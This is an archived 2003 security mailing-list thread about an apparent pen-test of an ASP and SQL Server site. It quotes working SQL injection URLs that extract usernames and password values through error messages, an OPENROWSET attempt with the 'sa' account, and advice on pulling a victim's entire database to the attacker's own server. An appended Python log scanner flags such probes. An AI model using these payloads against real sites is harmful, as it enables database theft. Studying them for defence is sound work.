Re: SQL Injection ASP + SQL Server (problem) ?!

From: Cesar (cesarc56at_private)
Date: Fri Aug 01 2003 - 08:14:08 PDT


    I misunderstood? What are you talking about?
    I wrote the paper!!!
    
    BTW: the process is very simple, you only have to get
    familiar with it and you will see how easy it is. Also
    you don't always need to install SQL Server on your
    system, you only need to have control (I mean to have
    some kind of access) of an SQL Server.
    
    
    Cesar.
    --- Stephen de Vries <stephen.devriesat_private>
    wrote:
    > 
    > Cesar,
    > 
    > I think you misunderstood the use of OPENROWSET
    > explained in the paper
    > below:
    >
    http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
    > 
    > The idea is to install MS-SQL server on YOUR OWN
    > SYSTEM, and then use the
    > openrowset command to pull data from the vulnerable
    > system to your system.
    > Of course, as the paper explains, you will have to
    > be able to make SQL
    > requests from the vulnerable system to yours over
    > some TCP port
    > (preferably 1433, as this saves you some extra
    > hassle).  As long as you
    > can inject the OPENROWSET command, and you can make
    > TCP connections out
    > from their database server, you can recreate their
    > entire database on your
    > local system.  The process is quite long and doesn't
    > allow for mistakes,
    > so I'd try it out in a lab environment first to get
    > familiar with it.
    > Good luck.
    > 
    > Stephen
    > 
    > 
    > 
    > 
    > On Wed, 30 Jul 2003 sekureat_private wrote:
    > 
    > > Hi Cesar,
    > >
    > > First Thkz for help and attention.
    > >
    > > > Take a look a this paper:
    > > >
    > >
    > > Your paper is very interesting.. with advanced
    > techniques.. :)
    > >
    > > But how I will use OPENROWSET if, as I wrote in my
    > first mail, I can't get the
    > > password for admin. :(
    > >
    > > ps.: See my last mail...
    > >
    > > Then I tried to use sa without password....
    > >
    > >
    >
    http://www.server.com/portal/index.asp?local=ler&id_noticia=(select%20*%20from%20OPENROWSET('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;address=127.0.0.1;','%20select%20*%20from%20usuarios'))%20--
    > >
    > > But it has a password...
    > >
    > > Error Type:
    > > Microsoft OLE DB Provider for ODBC Drivers
    > (0x80004005)
    > > [Microsoft][ODBC SQL Server Driver][SQL
    > Server]Login failed for user 'sa'.
    > >
    > >
    > > Ideas ?
    > >
    > > Another doubt: if the connection times out or the
    > server didn't respond...
    > > probably the SQL Server is on another server. Do
    > u know some tips to
    > > detect where the other SQL Server is (IP) ??
    > >
    > > ps.: If I could read local files I could try to find
    > user/pass in .asp files..
    > > ;)
    > >
    > > > also this tool, you only have to copy, paste and
    > click
    > > > and you get all the data you want:
    > > >
    >
    http://www.appsecinc.com/resources/freetools/DataThief.zip
    > >
    > > I tried it.. I used this string in the url
    > >
    >
    http://www.server.com/portal/index.asp?local=ler&id_noticia=1';
    > <***> with
    > > GET method. And I always received this message:
    > >
    > > Data Thief V1.0
    > > [DBMSSOCN] General network error. Check your
    > network connection.
    > >
    > > Can u help me ?? :)
    > >
    > > ps.: My first post is below.. :)
    > >
    > > Thkz and Regards
    > >
    > > [ ]'s
    > >
    > >
    > >
    > > >
    > > >
    > > >
    > > > Cesar.
    > > >
    > > > --- sekureat_private wrote:
    > > > > Hi,
    > > > >
    > > > > I'm doing a pen-test on a WebServer running
    > Win2K +
    > > > > IIS + ASP + SQL
    > > > > Server (filtered for internet connections).
    > > > >
    > > > > The IIS appears to be very well patched. I'm
    > trying
    > > > > SQL Injection. :)
    > > > >
    > > > > I found a bug in an ASP script... see:
    > > > >
    > > > >
    > > >
    > >
    >
    http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
    > > > >
    > > > > I received the name of the min(user) in the users
    > > > > table, see:
    > > > >
    > > > > Technical Information (for support personnel)
    > > > >
    > > > > Error Type:
    > > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > > (0x80040E07)
    > > > > [Microsoft][ODBC SQL Server Driver][SQL
    > > > > Server]Syntax error converting
    > > > > the nvarchar value 'admin' to a column of data
    > type
    > > > > int.
    > > > >
    > > > > The username is "admin". Now I want to know
    > the
    > > > > password of "admin". I
    > > > > tried:
    > > > >
    > > > >
    > > >
    > >
    >
    http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
    > > > >
    > > > > But I received this:
    > > > >
    > > > > Error Type:
    > > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > > (0x80004005)
    > > > > [Microsoft][ODBC SQL Server Driver][SQL
    > > > > Server]Subquery returned more
    > > > > than 1 value. This is not permitted when the
    > > > > subquery follows =, !=,
    > > > > <, <= , >, >= or when the subquery is used as
    > an
    > > > > expression.
    > > > >
    > > > > 1 - Does someone know how to make it return more than
    > 1
    > > > > value ?? Can you give me
    > > > > an example ?
    > > > >
    > > > > I tried it too:
    > > > >
    > > > >
    > > >
    > >
    >
    http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
    > > > >
    > > > > And I received this:
    > > > >
    > > > > Error Type:
    > > > > Microsoft OLE DB Provider for ODBC Drivers
    > > > > (0x80040E07)
    > > > > [Microsoft][ODBC SQL Server Driver][SQL
    > > > > Server]Syntax error converting
    > > > > the varchar value
    > > > >
    > > >
    > >
    >
    '{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481
    > > -0512-0545-0576-0609-0640}'
    > > > > to a column of data type int.
    > > > >
    > > > > 2 - But it isn't a "password", it appears to be a
    > > > > registry key. Does someone
    > > > > know what it is ?? And how to make it work and
    > see the
    > > > > password ? :)
    > > > >
    > > > > 3 - I tried to create a SQL Transaction like
    > this:
    > > > >
    > > > >
    > 
    === message truncated ===
    
    
    
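Every probe quoted in this thread lands in a parameter (id_notice / id_noticia) that the page compares against an int column, which is exactly what makes the type-conversion and subquery errors leak data. As an added example, not from the thread or from Cesar's paper, here is a small Python scanner that flags such requests in web-server logs; the log lines and the signature set are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Parameters the vulnerable page compares against an int column (names from the thread).
INT_PARAMS = {"id_notice", "id_noticia"}

# T-SQL fragments present in the probes quoted above; a constructed, defensive signature set.
SIGNATURES = [
    ("openrowset", re.compile(r"openrowset\s*\(", re.I)),  # ad-hoc remote query
    ("subselect", re.compile(r"\(\s*select\b", re.I)),     # SELECT where an int belongs
    ("comment", re.compile(r"--|/\*")),                    # comments out the rest of the query
    ("quote", re.compile(r"'")),                           # string delimiter in an int slot
]

def classify_request(path_and_query: str) -> dict:
    """Map each int-typed parameter carrying a non-integer value to the
    signatures it matched. An empty dict means nothing looked wrong."""
    findings = {}
    for pair in urlsplit(path_and_query).query.split("&"):
        name, _, raw = pair.partition("=")   # split only on the first '=':
        if name not in INT_PARAMS:           # payloads may contain '=' themselves
            continue
        value = unquote_plus(raw)
        if re.fullmatch(r"\d+", value):
            continue                         # a plain integer is what the page expects
        hits = [label for label, rx in SIGNATURES if rx.search(value)]
        findings[name] = hits or ["non-integer"]
    return findings

def scan_log(lines):
    """Return [(line_no, findings)] for log lines of the form 'METHOD URI STATUS'."""
    results = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) >= 2 and (found := classify_request(parts[1])):
            results.append((n, found))
    return results

# Constructed sample log, modelled on the URLs quoted in the thread.
SAMPLE_LOG = [
    "GET /portal/index.asp?local=read&id_notice=42 200",
    "GET /portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20-- 500",
    "GET /portal/index.asp?local=ler&id_noticia=(select%20*%20from%20OPENROWSET('SQLoledb','uid=sa','x'))%20-- 500",
    "GET /portal/index.asp?local=ler&id_noticia=1' 500",
]

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {found}")
```

The same check, applied to the parameter before it reaches the query, is the fix on the application side: reject anything that is not an integer instead of concatenating it into the SQL string.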



    This archive was generated by hypermail 2b30 : Fri Aug 01 2003 - 10:34:07 PDT